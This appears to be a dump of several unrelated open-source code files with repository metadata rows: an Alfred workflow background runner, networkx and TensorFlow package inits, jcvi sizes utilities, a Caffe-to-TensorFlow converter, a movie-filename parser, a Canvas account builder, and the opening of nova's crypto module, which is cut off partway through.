return {'premium': premium, 'validuntil': validuntil, 'trafficleft': trafficleft}
def signin(self, user, password, data):
self.load("http://freakshare.com/index.php?language=EN")
html = self.load("https://freakshare.com/login.html",
post={'submit': "Login",
'user' : user,
'pass' : password})
if ">Wrong Username or Password" in html:
self.fail_login()
| gpl-3.0 | 3,207,318,259,331,541,000 | 27.113208 | 89 | 0.518792 | false |
deanishe/alfred-workflow-dummy | src/workflow/background.py | 2 | 6171 | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright © 2014 [email protected]
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2014-04-06
#
"""
Run background tasks
"""
from __future__ import print_function, unicode_literals
import sys
import os
import subprocess
import pickle
from workflow import Workflow
__all__ = ['is_running', 'run_in_background']
wf = Workflow()
log = wf.logger
def _arg_cache(name):
"""Return path to pickle cache file for arguments
:param name: name of task
:type name: ``unicode``
:returns: Path to cache file
:rtype: ``unicode`` filepath
"""
return wf.cachefile('{}.argcache'.format(name))
def _pid_file(name):
"""Return path to PID file for ``name``
:param name: name of task
:type name: ``unicode``
:returns: Path to PID file for task
:rtype: ``unicode`` filepath
"""
return wf.cachefile('{}.pid'.format(name))
def _process_exists(pid):
"""Check if a process with PID ``pid`` exists
:param pid: PID to check
:type pid: ``int``
:returns: ``True`` if process exists, else ``False``
:rtype: ``Boolean``
"""
try:
os.kill(pid, 0)
except OSError: # not running
return False
return True
def is_running(name):
"""
Test whether task is running under ``name``
:param name: name of task
:type name: ``unicode``
:returns: ``True`` if task with name ``name`` is running, else ``False``
:rtype: ``Boolean``
"""
pidfile = _pid_file(name)
if not os.path.exists(pidfile):
return False
with open(pidfile, 'rb') as file:
pid = int(file.read().strip())
if _process_exists(pid):
return True
elif os.path.exists(pidfile):
os.unlink(pidfile)
return False
def _background(stdin='/dev/null', stdout='/dev/null',
stderr='/dev/null'): # pragma: no cover
"""Fork the current process into a background daemon.
:param stdin: where to read input
:type stdin: filepath
:param stdout: where to write stdout output
:type stdout: filepath
:param stderr: where to write stderr output
:type stderr: filepath
"""
# Do first fork.
try:
pid = os.fork()
if pid > 0:
sys.exit(0) # Exit first parent.
except OSError as e:
log.critical("fork #1 failed: (%d) %s\n" % (e.errno, e.strerror))
sys.exit(1)
# Decouple from parent environment.
os.chdir(wf.workflowdir)
os.umask(0)
os.setsid()
# Do second fork.
try:
pid = os.fork()
if pid > 0:
sys.exit(0) # Exit second parent.
except OSError as e:
log.critical("fork #2 failed: (%d) %s\n" % (e.errno, e.strerror))
sys.exit(1)
# Now I am a daemon!
# Redirect standard file descriptors.
si = file(stdin, 'r', 0)
so = file(stdout, 'a+', 0)
se = file(stderr, 'a+', 0)
if hasattr(sys.stdin, 'fileno'):
os.dup2(si.fileno(), sys.stdin.fileno())
if hasattr(sys.stdout, 'fileno'):
os.dup2(so.fileno(), sys.stdout.fileno())
if hasattr(sys.stderr, 'fileno'):
os.dup2(se.fileno(), sys.stderr.fileno())
def run_in_background(name, args, **kwargs):
"""Pickle arguments to cache file, then call this script again via
:func:`subprocess.call`.
:param name: name of task
:type name: ``unicode``
:param args: arguments passed as first argument to :func:`subprocess.call`
:param \**kwargs: keyword arguments to :func:`subprocess.call`
:returns: exit code of sub-process
:rtype: ``int``
When you call this function, it caches its arguments and then calls
``background.py`` in a subprocess. The Python subprocess will load the
cached arguments, fork into the background, and then run the command you
specified.
This function will return as soon as the ``background.py`` subprocess has
forked, returning the exit code of *that* process (i.e. not of the command
you're trying to run).
If that process fails, an error will be written to the log file.
If a process is already running under the same name, this function will
return immediately and will not run the specified command.
"""
if is_running(name):
log.info('Task `{}` is already running'.format(name))
return
argcache = _arg_cache(name)
# Cache arguments
with open(argcache, 'wb') as file:
pickle.dump({'args': args, 'kwargs': kwargs}, file)
log.debug('Command arguments cached to `{}`'.format(argcache))
# Call this script
cmd = ['/usr/bin/python', __file__, name]
log.debug('Calling {!r} ...'.format(cmd))
retcode = subprocess.call(cmd)
if retcode: # pragma: no cover
log.error('Failed to call task in background')
else:
log.debug('Executing task `{}` in background...'.format(name))
return retcode
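# Illustrative usage (not part of this module): the cache-refresh pattern the
# docstring above describes. ``update.py`` is a placeholder script name.
def _example_refresh_in_background():  # pragma: no cover
    """Kick off a background update unless one is already running."""
    if not is_running('update'):
        run_in_background('update',
                          ['/usr/bin/python',
                           os.path.join(wf.workflowdir, 'update.py')])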
def main(wf): # pragma: no cover
"""
Load cached arguments, fork into background, then call
:meth:`subprocess.call` with cached arguments
"""
name = wf.args[0]
argcache = _arg_cache(name)
if not os.path.exists(argcache):
log.critical('No arg cache found : {!r}'.format(argcache))
return 1
# Load cached arguments
with open(argcache, 'rb') as file:
data = pickle.load(file)
# Cached arguments
args = data['args']
kwargs = data['kwargs']
# Delete argument cache file
os.unlink(argcache)
pidfile = _pid_file(name)
# Fork to background
_background()
# Write PID to file
with open(pidfile, 'wb') as file:
file.write('{}'.format(os.getpid()))
# Run the command
try:
log.debug('Task `{}` running'.format(name))
log.debug('cmd : {!r}'.format(args))
retcode = subprocess.call(args, **kwargs)
if retcode:
log.error('Command failed with [{}] : {!r}'.format(retcode, args))
finally:
if os.path.exists(pidfile):
os.unlink(pidfile)
log.debug('Task `{}` finished'.format(name))
if __name__ == '__main__': # pragma: no cover
wf.run(main)
| mit | -6,637,798,976,903,900,000 | 24.390947 | 78 | 0.609076 | false |
ReganBell/QReview | build/lib/networkx/algorithms/centrality/__init__.py | 9 | 1239 | from networkx.algorithms.centrality.betweenness import *
from networkx.algorithms.centrality.betweenness_subset import *
from networkx.algorithms.centrality.closeness import *
from networkx.algorithms.centrality.current_flow_closeness import *
from networkx.algorithms.centrality.current_flow_betweenness import *
from networkx.algorithms.centrality.current_flow_betweenness_subset import *
from networkx.algorithms.centrality.degree_alg import *
from networkx.algorithms.centrality.dispersion import *
from networkx.algorithms.centrality.eigenvector import *
from networkx.algorithms.centrality.katz import *
from networkx.algorithms.centrality.load import *
from networkx.algorithms.centrality.communicability_alg import *
import networkx.algorithms.centrality.betweenness
import networkx.algorithms.centrality.closeness
import networkx.algorithms.centrality.current_flow_betweenness
import networkx.algorithms.centrality.current_flow_closeness
import networkx.algorithms.centrality.degree_alg
import networkx.algorithms.centrality.dispersion
import networkx.algorithms.centrality.eigenvector
import networkx.algorithms.centrality.load
import networkx.algorithms.centrality.communicability_alg
import networkx.algorithms.centrality.katz
| bsd-3-clause | -3,776,924,352,605,188,000 | 55.318182 | 76 | 0.869249 | false |
sgordon007/jcvi_062915 | formats/sizes.py | 1 | 4608 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import os.path as op
import sys
import logging
import numpy as np
from jcvi.formats.base import LineFile
from jcvi.apps.base import OptionParser, ActionDispatcher, need_update, sh, \
get_abs_path, which
class Sizes (LineFile):
"""
Two-column .sizes file, often generated by `faSize -detailed`
contigID size
"""
def __init__(self, filename, select=None):
assert op.exists(filename), "File `{0}` not found".format(filename)
# filename can be both .sizes file or FASTA formatted file
sizesname = filename
if not filename.endswith(".sizes"):
sizesname = filename + ".sizes"
filename = get_abs_path(filename)
if need_update(filename, sizesname):
cmd = "faSize"
if which(cmd):
cmd += " -detailed {0}".format(filename)
sh(cmd, outfile=sizesname)
else:
from jcvi.formats.fasta import Fasta
f = Fasta(filename)
fw = open(sizesname, "w")
for k, size in f.itersizes_ordered():
print >> fw, "\t".join((k, str(size)))
fw.close()
filename = sizesname
assert filename.endswith(".sizes")
super(Sizes, self).__init__(filename)
self.fp = open(filename)
self.filename = filename
# get sizes for individual contigs, both in list and dict
# this is to preserve the input order in the sizes file
sizes = list(self.iter_sizes())
if select:
assert select > 0
sizes = [x for x in sizes if x[1] >= select]
self.sizes_mapping = dict(sizes)
# get cumulative sizes, both in list and dict
ctgs, sizes = zip(*sizes)
self.sizes = sizes
cumsizes = np.cumsum([0] + list(sizes))
self.ctgs = ctgs
self.cumsizes = cumsizes
self.cumsizes_mapping = dict(zip(ctgs, cumsizes))
def __len__(self):
return len(self.sizes)
def get_size(self, ctg):
return self.sizes_mapping[ctg]
def get_cumsize(self, ctg):
return self.cumsizes_mapping[ctg]
def close(self, clean=False):
self.fp.close()
if clean:
os.remove(self.filename)
@property
def mapping(self):
return self.sizes_mapping
@property
def totalsize(self):
return sum(self.sizes)
def iter_sizes(self):
self.fp.seek(0)
for row in self.fp:
ctg, size = row.split()[:2]
yield ctg, int(size)
def get_position(self, ctg, pos):
if ctg not in self.cumsizes_mapping:
return None
return self.cumsizes_mapping[ctg] + pos
def get_breaks(self):
for i in xrange(len(self)):
yield self.ctgs[i], self.cumsizes[i], self.cumsizes[i + 1]
@property
def summary(self):
from jcvi.assembly.base import calculate_A50
ctgsizes = self.sizes_mapping.values()
a50, l50, n50 = calculate_A50(ctgsizes)
return sum(ctgsizes), l50, n50
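# Illustrative usage (not part of the original module): typical interaction with
# the Sizes class above. ``contigs.fasta`` is a placeholder path; any FASTA or
# two-column .sizes file would do.
def _example_sizes_usage(filename="contigs.fasta"):
    sizes = Sizes(filename)
    total, l50, n50 = sizes.summary
    print "Total {0} bp, L50 {1}, N50 {2}".format(total, l50, n50)
    for ctg, size in sizes.iter_sizes():
        print "{0}\t{1}".format(ctg, size)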
def main():
actions = (
('extract', 'extract the lines containing only the given IDs'),
('agp', 'write to AGP format from sizes file'),
)
p = ActionDispatcher(actions)
p.dispatch(globals())
def extract(args):
"""
%prog extract idsfile sizesfile
Extract the lines containing only the given IDs.
"""
p = OptionParser(extract.__doc__)
opts, args = p.parse_args(args)
if len(args) != 2:
sys.exit(not p.print_help())
idsfile, sizesfile = args
sizes = Sizes(sizesfile).mapping
fp = open(idsfile)
for row in fp:
name = row.strip()
size = sizes[name]
print "\t".join(str(x) for x in (name, size))
def agp(args):
"""
%prog agp <fastafile|sizesfile>
Convert the sizes file to a trivial AGP file.
"""
from jcvi.formats.agp import OO
p = OptionParser(agp.__doc__)
opts, args = p.parse_args(args)
if len(args) != 1:
sys.exit(not p.print_help())
sizesfile, = args
sizes = Sizes(sizesfile)
agpfile = sizes.filename.rsplit(".", 1)[0] + ".agp"
fw = open(agpfile, "w")
o = OO() # Without a filename
for ctg, size in sizes.iter_sizes():
o.add(ctg, ctg, size)
o.write_AGP(fw)
fw.close()
logging.debug("AGP file written to `{0}`.".format(agpfile))
return agpfile
if __name__ == '__main__':
main()
| bsd-2-clause | -5,013,986,353,859,409,000 | 25.331429 | 77 | 0.565538 | false |
DrSleep/tensorflow-deeplab-resnet | kaffe/tensorflow/transformer.py | 3 | 10312 | import numpy as np
from ..errors import KaffeError, print_stderr
from ..graph import GraphBuilder, NodeMapper
from ..layers import NodeKind
from ..transformers import (DataInjector, DataReshaper, NodeRenamer, ReLUFuser,
BatchNormScaleBiasFuser, BatchNormPreprocessor, ParameterNamer)
from . import network
def get_padding_type(kernel_params, input_shape, output_shape):
'''Translates Caffe's numeric padding to one of ('SAME', 'VALID').
Caffe supports arbitrary padding values, while TensorFlow only
supports 'SAME' and 'VALID' modes. So, not all Caffe paddings
can be translated to TensorFlow. There are some subtleties to
how the padding edge-cases are handled. These are described here:
https://github.com/Yangqing/caffe2/blob/master/caffe2/proto/caffe2_legacy.proto
'''
k_h, k_w, s_h, s_w, p_h, p_w = kernel_params
s_o_h = np.ceil(input_shape.height / float(s_h))
s_o_w = np.ceil(input_shape.width / float(s_w))
if (output_shape.height == s_o_h) and (output_shape.width == s_o_w):
return 'SAME'
v_o_h = np.ceil((input_shape.height - k_h + 1.0) / float(s_h))
v_o_w = np.ceil((input_shape.width - k_w + 1.0) / float(s_w))
if (output_shape.height == v_o_h) and (output_shape.width == v_o_w):
return 'VALID'
return None
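# Illustrative check (not part of the original module): how the translation above
# behaves for two common cases. The namedtuple below merely stands in for the
# real kernel-parameter and shape objects; only these fields are consulted.
def _example_padding_translation():
    from collections import namedtuple
    Shape = namedtuple('Shape', ['height', 'width'])
    # 7x7 kernel, stride 2, pad 3 on a 224x224 input -> 112x112 output: 'SAME'
    same = get_padding_type((7, 7, 2, 2, 3, 3), Shape(224, 224), Shape(112, 112))
    # 3x3 kernel, stride 1, no padding on a 10x10 input -> 8x8 output: 'VALID'
    valid = get_padding_type((3, 3, 1, 1, 0, 0), Shape(10, 10), Shape(8, 8))
    return same, valid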
class TensorFlowNode(object):
'''An intermediate representation for TensorFlow operations.'''
def __init__(self, op, *args, **kwargs):
# A string corresponding to the TensorFlow operation
self.op = op
# Positional arguments for the operation
self.args = args
# Keyword arguments for the operation
self.kwargs = list(kwargs.items())
# The source Caffe node
self.node = None
def format(self, arg):
'''Returns a string representation for the given value.'''
return "'%s'" % arg if isinstance(arg, basestring) else str(arg)
def pair(self, key, value):
'''Returns key=formatted(value).'''
return '%s=%s' % (key, self.format(value))
def emit(self):
'''Emits the Python source for this node.'''
# Format positional arguments
args = map(self.format, self.args)
# Format any keyword arguments
if self.kwargs:
args += [self.pair(k, v) for k, v in self.kwargs]
# Set the node name
args.append(self.pair('name', self.node.name))
args = ', '.join(args)
return '%s(%s)' % (self.op, args)
class MaybeActivated(object):
def __init__(self, node, default=True):
self.inject_kwargs = {}
if node.metadata.get('relu', False) != default:
self.inject_kwargs['relu'] = not default
def __call__(self, *args, **kwargs):
kwargs.update(self.inject_kwargs)
return TensorFlowNode(*args, **kwargs)
class TensorFlowMapper(NodeMapper):
def get_kernel_params(self, node):
kernel_params = node.layer.kernel_parameters
input_shape = node.get_only_parent().output_shape
padding = get_padding_type(kernel_params, input_shape, node.output_shape)
# Only emit the padding if it's not the default value.
padding = {'padding': padding} if padding != network.DEFAULT_PADDING else {}
return (kernel_params, padding)
def map_convolution(self, node):
(kernel_params, kwargs) = self.get_kernel_params(node)
h = kernel_params.kernel_h
w = kernel_params.kernel_w
c_o = node.output_shape[1]
c_i = node.parents[0].output_shape[1]
group = node.parameters.group
if group != 1:
kwargs['group'] = group
if not node.parameters.bias_term:
kwargs['biased'] = False
assert kernel_params.kernel_h == h
assert kernel_params.kernel_w == w
return MaybeActivated(node)('conv', kernel_params.kernel_h, kernel_params.kernel_w, c_o,
kernel_params.stride_h, kernel_params.stride_w, **kwargs)
def map_relu(self, node):
return TensorFlowNode('relu')
def map_pooling(self, node):
pool_type = node.parameters.pool
if pool_type == 0:
pool_op = 'max_pool'
elif pool_type == 1:
pool_op = 'avg_pool'
else:
# Stochastic pooling, for instance.
raise KaffeError('Unsupported pooling type.')
(kernel_params, padding) = self.get_kernel_params(node)
return TensorFlowNode(pool_op, kernel_params.kernel_h, kernel_params.kernel_w,
kernel_params.stride_h, kernel_params.stride_w, **padding)
def map_inner_product(self, node):
#TODO: Axis
assert node.parameters.axis == 1
#TODO: Unbiased
assert node.parameters.bias_term == True
return MaybeActivated(node)('fc', node.parameters.num_output)
def map_softmax(self, node):
return TensorFlowNode('softmax')
def map_lrn(self, node):
params = node.parameters
# The window size must be an odd value. For a window
# size of (2*n+1), TensorFlow defines depth_radius = n.
assert params.local_size % 2 == 1
# Caffe scales by (alpha/(2*n+1)), whereas TensorFlow
# just scales by alpha (as does Krizhevsky's paper).
# We'll account for that here.
alpha = params.alpha / float(params.local_size)
return TensorFlowNode('lrn', int(params.local_size / 2), alpha, params.beta)
def map_concat(self, node):
axis = (2, 3, 1, 0)[node.parameters.axis]
return TensorFlowNode('concat', axis)
def map_dropout(self, node):
return TensorFlowNode('dropout', node.parameters.dropout_ratio)
def map_batch_norm(self, node):
scale_offset = len(node.data) == 4
kwargs = {'is_training': True} if scale_offset else {'is_training': True, 'scale': False}
return MaybeActivated(node, default=False)('batch_normalization', **kwargs)
def map_eltwise(self, node):
operations = {0: 'multiply', 1: 'add', 2: 'max'}
op_code = node.parameters.operation
try:
return TensorFlowNode(operations[op_code])
except KeyError:
raise KaffeError('Unknown elementwise operation: {}'.format(op_code))
def commit(self, chains):
return chains
class TensorFlowEmitter(object):
def __init__(self, tab=None):
self.tab = tab or ' ' * 4
self.prefix = ''
def indent(self):
self.prefix += self.tab
def outdent(self):
self.prefix = self.prefix[:-len(self.tab)]
def statement(self, s):
return self.prefix + s + '\n'
def emit_imports(self):
return self.statement('from kaffe.tensorflow import Network\n')
def emit_class_def(self, name):
return self.statement('class %s(Network):' % (name))
def emit_setup_def(self):
return self.statement('def setup(self):')
def emit_parents(self, chain):
assert len(chain)
s = '(self.feed('
sep = ', \n' + self.prefix + (' ' * len(s))
s += sep.join(["'%s'" % parent.name for parent in chain[0].node.parents])
return self.statement(s + ')')
def emit_node(self, node):
return self.statement(' ' * 5 + '.' + node.emit())
def emit(self, name, chains):
s = self.emit_imports()
s += self.emit_class_def(name)
self.indent()
s += self.emit_setup_def()
self.indent()
blocks = []
for chain in chains:
b = ''
b += self.emit_parents(chain)
for node in chain:
b += self.emit_node(node)
blocks.append(b[:-1] + ')')
s = s + '\n\n'.join(blocks)
return s
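# Illustrative example (not part of the original module): what a single mapped
# operation renders to. The tiny fake node below only provides the ``name``
# attribute that TensorFlowNode.emit() reads.
def _example_emitted_call():
    class _FakeCaffeNode(object):
        name = 'conv1'
    tf_node = TensorFlowNode('conv', 7, 7, 64, 2, 2, relu=True)
    tf_node.node = _FakeCaffeNode()
    return tf_node.emit()  # "conv(7, 7, 64, 2, 2, relu=True, name='conv1')"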
class TensorFlowTransformer(object):
def __init__(self, def_path, data_path, verbose=True, phase='test'):
self.verbose = verbose
self.phase = phase
self.load(def_path, data_path, phase)
self.params = None
self.source = None
def load(self, def_path, data_path, phase):
# Build the graph
graph = GraphBuilder(def_path, phase).build()
if data_path is not None:
# Load and associate learned parameters
graph = DataInjector(def_path, data_path)(graph)
# Transform the graph
transformers = [
# Fuse split batch normalization layers
BatchNormScaleBiasFuser(),
# Fuse ReLUs
# TODO: Move non-linearity application to layer wrapper, allowing
# any arbitrary operation to be optionally activated.
ReLUFuser(allowed_parent_types=[NodeKind.Convolution, NodeKind.InnerProduct,
NodeKind.BatchNorm]),
# Rename nodes
# Slashes are used for scoping in TensorFlow. Replace slashes
# in node names with underscores.
# (Caffe's GoogLeNet implementation uses slashes)
NodeRenamer(lambda node: node.name.replace('/', '_'))
]
self.graph = graph.transformed(transformers)
# Display the graph
if self.verbose:
print_stderr(self.graph)
def transform_data(self):
if self.params is None:
transformers = [
# Reshape the parameters to TensorFlow's ordering
DataReshaper({
# (c_o, c_i, h, w) -> (h, w, c_i, c_o)
NodeKind.Convolution: (2, 3, 1, 0),
# (c_o, c_i) -> (c_i, c_o)
NodeKind.InnerProduct: (1, 0)
}),
# Pre-process batch normalization data
BatchNormPreprocessor(),
# Convert parameters to dictionaries
ParameterNamer(),
]
self.graph = self.graph.transformed(transformers)
self.params = {node.name: node.data for node in self.graph.nodes if node.data}
return self.params
def transform_source(self):
if self.source is None:
mapper = TensorFlowMapper(self.graph)
chains = mapper.map()
emitter = TensorFlowEmitter()
self.source = emitter.emit(self.graph.name, chains)
return self.source
| mit | -476,553,708,143,358,400 | 35.182456 | 97 | 0.589701 | false |
MinhalSyed/MovieLibrary | LibraryImporter.py | 1 | 4145 | '''You need python3 installed on your computer to run this program.'''
import re
from os import listdir, walk
from os.path import isfile, join
from tkinter.filedialog import askdirectory, asksaveasfilename
#path = "./Movies/"
path = askdirectory(title="Please select a movie directory")
outputpath = asksaveasfilename(defaultextension='.txt', title ="Please select where you want to save your file")
onlyfiles = []
for (dirpath, dirnames, filenames) in walk(path):
for fname in filenames:
if (bool(re.match("(.*)(mkv|iso|mp4|m2ts|avi)$", fname, re.I))):
onlyfiles.append(fname)
#onlyfiles = [ f for f in listdir(path) if (isfile(join(path,f)) and (bool(re.match("(.*)(mkv|iso|mp4|m2ts|avi)$", f, re.I))))]
#print(onlyfiles)
#oneLine = '\n'.join(onlyfiles) + '\n';
# sampleList = ["The.Newsroom.2012.S02E06.720p.HDTV.x264-KILLERS.mkv",
# "SonOFBatman.2014.iso",
# "Breaking.Bad.S05E10.Buried.HDTV.XviD-AFG.avi",
# "Breaking.Bad.S05E10.Buried.720p.HDTV.x264-AFG.mkv", #Incorrectly nonHD
# "Dexter.S08E08.HDTV.XviD-AFG.avi",
# "Dexter.S08E07.1080p.HDTV.x264-QCF.mkv",
# "Dexter S08E07 720p HDTV x264-QCF.mkv",
# "The.Great.Gatsby.2013.BluRay.1080p.DTS.x264-CHD.mkv", #Incorrectly nonHD
# "The Forbidden Girl 2013 BRRIP Xvid AC3-BHRG.avi",
# "Pain.&.Gain.2013.720p.BluRay.DD5.1.x264-HiDt.mkv",
# "Band.of.Brothers.S01E02.Day.of.Days.DVDRip.XviD-AC3-BAGS.avi",
# "Dexter.S08E06.PROPER.720p.HDTV.x264-IMMERSE.mkv", #Incorrectly nonHD
# "Dexter S08E06 PROPER 720p HDTV x264-IMMERSE.mkv", #Incorrectly nonHD
# "10.Things.I.Hate.About.You.1999.720p.BluRay.x264-SiNNERS.mkv",
# "101.Dalmatians.1961.1080p.BluRay.X264-AMIABLE.mkv",
# "101.Dalmatians.1961.1080p.BluRay.X264-AMIABLE.sub",
# "[email protected]",
# "2.Guns.2013.1080p.BluRay.DTS.x264-HDMaNiAcS.mkv",
# "28 Days Later... 2002 1080p DTS multisub HighCode.mkv",
# "28 Days Later... 2002 1080p DTS multisub HighCode.mp4",
# "28 Weeks Later 2007 BDRip 1080p DTS multisub HighCode.mkv"]
class Movies():
    def __init__(self):
        # Keep the movie list on the instance instead of a shared class attribute.
        self.l = []
def addMovie(self, title,year,quality, extension):
newm = MovieClass(title,year,quality, extension)
self.l.append(newm)
def to_JSON(self):
output = "[";
for movie in self.l:
movStr = movie.to_JSON() + '\n'
output += movStr + ","
output = output[:-1]
output += "]";
return output
class MovieClass():
title = ""
year = ""
quality = ""
    extension = ""
def __init__(self, title,year,quality, extension):
        self.title = title.title().strip()
        self.year = year.strip()
        self.quality = quality.strip()
        self.extension = extension.strip().lower()
    def to_JSON(self):
        fields = ("\"title\": \"{0.title}\", \"year\": \"{0.year}\", "
                  "\"quality\": \"{0.quality}\", "
                  "\"extension\": \"{0.extension}\"").format(self)
        return "{" + fields + "}"
#a_file = open('rand2.txt','w')
myMovies = Movies()
for name in onlyfiles:
movie = re.findall(r"""(.*?[ .]) # Title
(\d{4}) # Year
[ .a-zA-Z]* # Space, period, or words
(\d{3,4}p)? # Quality
(.*) # Space, period, or words
(\.\w{3,4}) #Extension
""", name, re.VERBOSE)
if len(movie) > 0:
#a_file.write("Title: "+movie[0][0].replace(".", " ") + "\n")
#a_file.write("Year: "+movie[0][1].replace(".", " ") + "\n")
#a_file.write("Quality: "+(movie[0][2]+'\n' if len(movie[0][1])>0 else
#"Unknown\n"))
myMovies.addMovie(movie[0][0].replace(".", " "), movie[0][1].replace(".", " "), (movie[0][2]), movie[0][4])
else:
movie = re.findall(r"""(.*) # Title
(\.\w{3,4}) #Extension
""", name, re.VERBOSE)
myMovies.addMovie(movie[0][0].replace(".", " "), "", "", movie[0][1])
#a_file.write("error")
with open(outputpath, 'w') as outfile:
outfile.write(myMovies.to_JSON())
#outfile.write(oneLine)
#print(myMovies.to_JSON())
#a_file.close()
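# Illustrative example (not part of the original script): what the regex above
# extracts from one of the names in the commented-out sampleList.
def _example_parse():
    name = "The.Great.Gatsby.2013.BluRay.1080p.DTS.x264-CHD.mkv"
    movie = re.findall(r"""(.*?[ .]) # Title
                           (\d{4}) # Year
                           [ .a-zA-Z]* # Space, period, or words
                           (\d{3,4}p)? # Quality
                           (.*) # Space, period, or words
                           (\.\w{3,4}) #Extension
                           """, name, re.VERBOSE)
    # groups -> ("The.Great.Gatsby.", "2013", "1080p", ".DTS.x264-CHD", ".mkv"),
    # which addMovie turns into title "The Great Gatsby", year "2013",
    # quality "1080p", extension ".mkv".
    return movie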
| mit | 2,350,329,632,189,715,000 | 37.37963 | 141 | 0.593245 | false |
uw-it-aca/canvas-sis-provisioner | sis_provisioner/builders/accounts.py | 1 | 2563 | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from sis_provisioner.builders import Builder
from sis_provisioner.models.account import Curriculum
from sis_provisioner.csv.format import AccountCSV
from sis_provisioner.dao.account import (
get_all_campuses, get_all_colleges, get_curricula_by_department,
get_departments_by_college, account_sis_id, account_name)
from django.conf import settings
class AccountBuilder(Builder):
"""
Generates the data for all sub-accounts found for the current
term. Sub-account hierarchy is root account, campus, college,
department, curriculum.
"""
def build(self, **kwargs):
root_id = getattr(settings, 'SIS_IMPORT_ROOT_ACCOUNT_ID', None)
for campus in get_all_campuses():
campus_id = account_sis_id([root_id, campus.label])
self.data.add(AccountCSV(campus_id, root_id, campus))
for college in get_all_colleges():
college_id = account_sis_id([root_id, college.campus_label,
college.name])
campus_id = account_sis_id([root_id, college.campus_label])
self.data.add(AccountCSV(college_id, campus_id, college))
for department in get_departments_by_college(college):
dept_id = account_sis_id([root_id, college.campus_label,
college.name, department.label])
self.data.add(AccountCSV(dept_id, college_id, department))
for curriculum in get_curricula_by_department(
department, future_terms=2, view_unpublished=True):
curr_id = account_sis_id([root_id, college.campus_label,
college.name, department.label,
curriculum.label])
if self.data.add(AccountCSV(curr_id, dept_id, curriculum)):
# Update the Curriculum model for this curriculum
try:
model = Curriculum.objects.get(
curriculum_abbr=curriculum.label)
except Curriculum.DoesNotExist:
model = Curriculum(
curriculum_abbr=curriculum.label)
model.full_name = account_name(curriculum)
model.subaccount_id = curr_id
model.save()
return self._write()
| apache-2.0 | -199,273,288,973,789,730 | 43.964912 | 79 | 0.569645 | false |
admcrae/tensorflow | tensorflow/contrib/losses/__init__.py | 23 | 1205 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for building neural network losses.
See @{$python/contrib.losses}.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import
from tensorflow.contrib.losses.python import losses
from tensorflow.contrib.losses.python.losses import *
# pylint: enable=unused-import,wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__, doc_string_modules=[losses])
| apache-2.0 | -6,667,677,021,512,173,000 | 37.870968 | 80 | 0.721992 | false |
Francis-Liu/animated-broccoli | nova/crypto.py | 14 | 14437 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Wrappers around standard crypto data elements.
Includes root and intermediate CAs, SSH key_pairs and x509 certificates.
"""
from __future__ import absolute_import
import base64
import binascii
import os
from cryptography import exceptions
from cryptography.hazmat import backends
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography import x509
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import fileutils
from oslo_utils import timeutils
import paramiko
import six
from nova import context
from nova import db
from nova import exception
from nova.i18n import _, _LE
from nova import paths
from nova import utils
LOG = logging.getLogger(__name__)
crypto_opts = [
cfg.StrOpt('ca_file',
default='cacert.pem',
help=_('Filename of root CA')),
cfg.StrOpt('key_file',
default=os.path.join('private', 'cakey.pem'),
help=_('Filename of private key')),
cfg.StrOpt('crl_file',
default='crl.pem',
help=_('Filename of root Certificate Revocation List')),
cfg.StrOpt('keys_path',
default=paths.state_path_def('keys'),
help=_('Where we keep our keys')),
cfg.StrOpt('ca_path',
default=paths.state_path_def('CA'),
help=_('Where we keep our root CA')),
cfg.BoolOpt('use_project_ca',
default=False,
help=_('Should we use a CA for each project?')),
cfg.StrOpt('user_cert_subject',
default='/C=US/ST=California/O=OpenStack/'
'OU=NovaDev/CN=%.16s-%.16s-%s',
help=_('Subject for certificate for users, %s for '
'project, user, timestamp')),
cfg.StrOpt('project_cert_subject',
default='/C=US/ST=California/O=OpenStack/'
'OU=NovaDev/CN=project-ca-%.16s-%s',
help=_('Subject for certificate for projects, %s for '
'project, timestamp')),
]
CONF = cfg.CONF
CONF.register_opts(crypto_opts)
def ca_folder(project_id=None):
if CONF.use_project_ca and project_id:
return os.path.join(CONF.ca_path, 'projects', project_id)
return CONF.ca_path
def ca_path(project_id=None):
return os.path.join(ca_folder(project_id), CONF.ca_file)
def key_path(project_id=None):
return os.path.join(ca_folder(project_id), CONF.key_file)
def crl_path(project_id=None):
return os.path.join(ca_folder(project_id), CONF.crl_file)
def fetch_ca(project_id=None):
if not CONF.use_project_ca:
project_id = None
ca_file_path = ca_path(project_id)
if not os.path.exists(ca_file_path):
raise exception.CryptoCAFileNotFound(project=project_id)
with open(ca_file_path, 'r') as cafile:
return cafile.read()
def ensure_ca_filesystem():
"""Ensure the CA filesystem exists."""
ca_dir = ca_folder()
if not os.path.exists(ca_path()):
genrootca_sh_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), 'CA', 'genrootca.sh'))
fileutils.ensure_tree(ca_dir)
utils.execute("sh", genrootca_sh_path, cwd=ca_dir)
def generate_fingerprint(public_key):
try:
pub_bytes = public_key.encode('utf-8')
# Test that the given public_key string is a proper ssh key. The
# returned object is unused since pyca/cryptography does not have a
# fingerprint method.
